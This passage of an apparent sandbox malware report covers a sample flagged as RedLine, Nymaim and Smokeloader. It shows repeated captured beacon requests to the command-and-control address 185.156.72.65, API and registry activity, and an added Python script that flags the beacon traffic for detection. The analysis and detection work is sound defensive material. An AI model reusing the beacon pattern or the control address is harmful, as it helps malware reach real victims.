                      Nov 30, 2024 13:12:02.015568972 CET | 49940 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:02.015964031 CET | 49940 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:02.135844946 CET | 80 | 49940 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:12:23.944793940 CET | 80 | 49940 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:12:23.944992065 CET | 49940 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:23.945219040 CET | 49940 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:24.065073013 CET | 80 | 49940 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:12:26.958729982 CET | 49983 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:27.078782082 CET | 80 | 49983 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:12:27.078860044 CET | 49983 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:27.079211950 CET | 49983 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:27.199192047 CET | 80 | 49983 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:12:35.418582916 CET | 49983 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:38.428158998 CET | 49984 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:38.549258947 CET | 80 | 49984 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:12:38.552262068 CET | 49984 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:38.552824974 CET | 49984 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:38.672771931 CET | 80 | 49984 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:00.548785925 CET | 80 | 49984 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:00.549307108 CET | 49984 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:00.549307108 CET | 49984 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:00.669470072 CET | 80 | 49984 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:03.570276022 CET | 49985 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:03.690567970 CET | 80 | 49985 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:03.690651894 CET | 49985 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:03.690958977 CET | 49985 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:03.810861111 CET | 80 | 49985 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:25.618124008 CET | 80 | 49985 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:25.618233919 CET | 49985 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:25.618396997 CET | 49985 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:25.738241911 CET | 80 | 49985 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:28.629265070 CET | 49986 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:28.751872063 CET | 80 | 49986 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:28.751966000 CET | 49986 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:28.752226114 CET | 49986 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:28.872246027 CET | 80 | 49986 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:32.284235001 CET | 49986 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:35.301835060 CET | 49987 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:35.422029972 CET | 80 | 49987 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:35.422116041 CET | 49987 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:35.423093081 CET | 49987 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:35.543107986 CET | 80 | 49987 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:57.424809933 CET | 80 | 49987 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:13:57.424871922 CET | 49987 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:57.425225019 CET | 49987 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:13:57.546022892 CET | 80 | 49987 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:14:00.444245100 CET | 49988 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:14:00.564426899 CET | 80 | 49988 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:14:00.564600945 CET | 49988 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:14:00.568243027 CET | 49988 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:14:00.688265085 CET | 80 | 49988 | 185.156.72.65 | 192.168.2.5
                      • 185.156.72.65
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.5 | 49704 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:10:06.459533930 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.5 | 49737 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:10:31.544235945 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.5 | 49792 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:10:56.829624891 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.5 | 49819 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:11:07.984884977 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.5 | 49874 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:11:33.062859058 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      5 | 192.168.2.5 | 49932 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:11:58.126240015 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      6 | 192.168.2.5 | 49940 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:12:02.015964031 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      7 | 192.168.2.5 | 49983 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:12:27.079211950 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      8 | 192.168.2.5 | 49984 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:12:38.552824974 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      9 | 192.168.2.5 | 49985 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:13:03.690958977 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      10 | 192.168.2.5 | 49986 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:13:28.752226114 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      11 | 192.168.2.5 | 49987 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:13:35.423093081 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      12 | 192.168.2.5 | 49988 | 185.156.72.65 | 80 | 5544 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 30, 2024 13:14:00.568243027 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache
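
The TCP packet table and the thirteen HTTP sessions above show one and the same 416-byte request, GET /add?substr=mixtwo&s=three&sub=nosub, re-sent to 185.156.72.65 roughly every 25 seconds with a User-Agent of literally "1" and a bare-IP Host header. The Python below is added here as a worked example; it is not part of the Joe Sandbox report or of the sample. It parses the captured request text and the session start times and derives the beaconing indicators a detection engineer would key on. The request text and the timestamps are copied from the sessions above; the thresholds (User-Agent shorter than eight characters or without letters, five or more identical requests, at least half of the gaps within 20% of the median) are the example's own choices, not values from the report.

```python
"""Beacon triage over the HTTP sessions in the report above (added example)."""
import ipaddress
from datetime import datetime
from statistics import median
from typing import Dict, List, Tuple

# Start timestamps of the 13 OUT requests, copied from the session tables
# above (Nov 30, 2024, CET). Constructed list for this example.
SESSION_TIMESTAMPS = [
    "13:10:06.459533930", "13:10:31.544235945", "13:10:56.829624891",
    "13:11:07.984884977", "13:11:33.062859058", "13:11:58.126240015",
    "13:12:02.015964031", "13:12:27.079211950", "13:12:38.552824974",
    "13:13:03.690958977", "13:13:28.752226114", "13:13:35.423093081",
    "13:14:00.568243027",
]

# The request exactly as the report prints it; identical in all 13 sessions.
RAW_REQUEST = (
    "GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1\r\n"
    "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, "
    "image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"
    "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\n"
    "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n"
    "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"
    "User-Agent: 1\r\n"
    "Host: 185.156.72.65\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (method, target, lower-cased headers)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def intervals_seconds(timestamps: List[str]) -> List[float]:
    """Gaps between consecutive session starts, in seconds."""
    # strptime's %f takes at most six fractional digits, so drop the nanoseconds.
    parsed = [datetime.strptime(t[:15], "%H:%M:%S.%f") for t in timestamps]
    return [(b - a).total_seconds() for a, b in zip(parsed, parsed[1:])]


def is_ipv4_literal(host: str) -> bool:
    """True when the Host header is a bare dotted-quad (optionally with :port)."""
    try:
        ipaddress.IPv4Address(host.split(":")[0])
        return True
    except ipaddress.AddressValueError:
        return False


def triage(raw_requests: List[str], timestamps: List[str]) -> Dict[str, object]:
    """Score a capture for the C2-beacon traits visible in this report.

    Thresholds (UA shorter than 8 chars or letter-free, >= 5 identical requests,
    at least half of the gaps within 20% of the median) are this example's own.
    """
    parsed = [parse_request(r) for r in raw_requests]
    targets = {f"{m} {t}" for m, t, _ in parsed}
    agents = {h.get("user-agent", "") for _, _, h in parsed}
    hosts = {h.get("host", "") for _, _, h in parsed}
    gaps = intervals_seconds(timestamps)
    period = median(gaps) if gaps else 0.0
    regular = [g for g in gaps if abs(g - period) <= 0.2 * period]

    findings: List[str] = []
    for ua in sorted(agents):
        if len(ua) < 8 or not any(c.isalpha() for c in ua):
            findings.append(f"non-browser User-Agent {ua!r}")
    if hosts and all(is_ipv4_literal(h) for h in hosts):
        findings.append(f"Host header is a bare IPv4 address: {', '.join(sorted(hosts))}")
    if len(targets) == 1 and len(parsed) >= 5:
        findings.append(f"identical request repeated {len(parsed)} times: {next(iter(targets))}")
    if gaps and 2 * len(regular) >= len(gaps):
        findings.append(f"regular polling: {len(regular)}/{len(gaps)} gaps within 20% of the {period:.1f}s median")
    return {
        "requests": len(parsed),
        "median_period_s": round(period, 1),
        "regular_gaps": len(regular),
        "findings": findings,
    }


if __name__ == "__main__":
    for line in triage([RAW_REQUEST] * len(SESSION_TIMESTAMPS), SESSION_TIMESTAMPS)["findings"]:
        print(line)
```

On this capture the median gap comes out at about 25 seconds with eight of the twelve gaps inside the 20% band; the shorter gaps (4 to 11 seconds) are the retries visible in the TCP table where the server closed a connection and the sample reconnected on the next port. The User-Agent and bare-IP Host checks are the cheapest to turn into a proxy or IDS rule; the periodicity check needs per-destination state and is better suited to flow logs.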


                      Target ID:0
                      Start time:07:10:00
                      Start date:30/11/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x400000
                      File size:1'991'168 bytes
                      MD5 hash:BD23F2EE2AEA0A9C0464BC44292485FC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.2080963099.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                        Execution Graph

                        Execution Coverage:1.6%
                        Dynamic/Decrypted Code Coverage:5.3%
                        Signature Coverage:3.5%
                        Total number of Nodes:564
                        Total number of Limit Nodes:6
                        execution_graph (the rendered graph's node/edge dump is replaced here by the API-call nodes it contains, grouped by code region; nodes annotated only as "N API calls" carry no API name and are omitted)

                        Region 0x5f5xxx-0x5faxxx:
                          0x5f89c8  LoadLibraryA (reached from 0x5f79bf, continues at 0x5fa16c)
                          0x5fa2d4, 0x5fa2fb  RegOpenKeyA, two calls in sequence (reached from 0x5f593a via 0x5fa2a1, continues at 0x5f5d9d)

                        Region 0x4787xxx-0x4788xxx (inside the Windows_Trojan_RedLineStealer_ed346e4c Yara hit at base 0x4780000):
                          0x4788488  CreateToolhelp32Snapshot
                          0x47884a4  Module32First
                          0x478815f  VirtualAlloc

                        Region 0x6f27xx-0x6f28xx:
                          0x6f27d0  VirtualProtect (reached from 0x6f2834 via 0x6f283d, continues at 0x6f27f0)

                        Region 0x493xxxx (inside the JoeSecurity_Nymaim and Windows_Trojan_Smokeloader_3687686f Yara hits at base 0x4930000):
                          0x4930e0f  SetErrorMode, SetErrorMode (two consecutive calls, reached from entry 0x493003c via 0x493004c)
                          0x4930dbb  GetPEB
                          0x49302ce  VirtualProtect
                          0x4930439  VirtualFree
                          0x49304e3, 0x49305f4  LoadLibraryA (both paths end at 0x49308c7)

                        Region 0x400000 image (the sample's own code plus MSVC runtime startup; __FrameHandler3::FrameUnwindToState, ___scrt_is_nonwritable_in_current_image, ___scrt_release_startup_lock, __InternalCxxFrameHandler, std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t, Concurrency::cancel_current_task and CatchGuardHandler are runtime-library symbols):
                          0x40a58a  IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
                          0x40a2ec  IsProcessorFeaturePresent
                          0x40a6b8  GetStartupInfoW
                          0x410822  GetSystemTimeAsFileTime
                          0x4128e2  GetLastError
                          0x412987  SetLastError
                          0x405aa8  Sleep
                          0x406a3e  Sleep, called from a loop at 0x4069df that also re-enters 0x402460 ("43 API calls")
                          0x409a20  IsProcessorFeaturePresent
                          0x409a2a  SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
                          0x409c7b  EnterCriticalSection, LeaveCriticalSection, RtlWakeAllConditionVariable, SetEvent, ResetEvent
                          0x4116b2  EnterCriticalSection, LeaveCriticalSection
                          0x413ce2  RtlAllocateHeap
                          0x40af80  RaiseException
                          0x404f70  collapsed node, "130 API calls, 6 library calls"
                          Blocks 0x406f60-0x408250 are collapsed nodes of "53 API calls 2 library calls" each, chained through 0x402460 and 0x402390.
VirtualAlloc 29783->29785 29784->29785 29785->29771
                        APIs
                        • GetTempPathA.KERNEL32(00000104,?,8F925C9F,75920F00,00000000), ref: 00403DAA
                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                        • Sleep.KERNEL32(000003E8), ref: 00403F42
                        • __Init_thread_footer.LIBCMT ref: 00404517
                        • __Init_thread_footer.LIBCMT ref: 004046DD
                        • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                        • __Init_thread_footer.LIBCMT ref: 00404975
                        • __Init_thread_footer.LIBCMT ref: 00404BDE
                        • CoInitialize.OLE32(00000000), ref: 00404C5F
                        • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                        • __Init_thread_footer.LIBCMT ref: 004050DD
                        • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                        • __Init_thread_footer.LIBCMT ref: 004053EB
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,8F925C9F), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                        • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                        • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                        • __Init_thread_footer.LIBCMT ref: 00404046
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                          • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                          • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                          • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                        • __Init_thread_footer.LIBCMT ref: 00404222
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                        • API String ID: 995133137-3578497191
                        • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                        • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                        • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                        • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 498 404f70-405085 call 410822 call 4106e2 call 40b570 call 409b8a call 40b570 509 405090-40509b 498->509 510 4050e5-4050ec 509->510 511 40509d-4050b1 call 409cc5 509->511 512 40512d-405150 510->512 513 4050ee-405128 510->513 511->510 518 4050b3-4050e2 call 409fd7 call 409c7b 511->518 515 405153-405158 512->515 513->512 515->515 517 40515a-4051fc call 402760 call 409310 515->517 527 405211-40522c call 401e50 517->527 528 4051fe-405207 call 409a25 517->528 518->510 533 40525d-405285 527->533 534 40522e-40523d 527->534 528->527 535 4052b6-4052b8 533->535 536 405287-405296 533->536 537 405253-40525a call 409b7c 534->537 538 40523f-40524d 534->538 543 4052f0-4052fb Sleep 535->543 544 4052ba-4052cd 535->544 541 405298-4052a6 536->541 542 4052ac-4052b3 call 409b7c 536->542 537->533 538->537 539 4058dd-405982 call 40cfef RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 538->539 554 4059b0-4059c8 539->554 555 405984-405990 539->555 541->539 541->542 542->535 543->509 548 4052d0-4052d5 544->548 548->548 551 4052d7-4052e9 call 4024a0 548->551 551->543 561 4052eb-4052ee 551->561 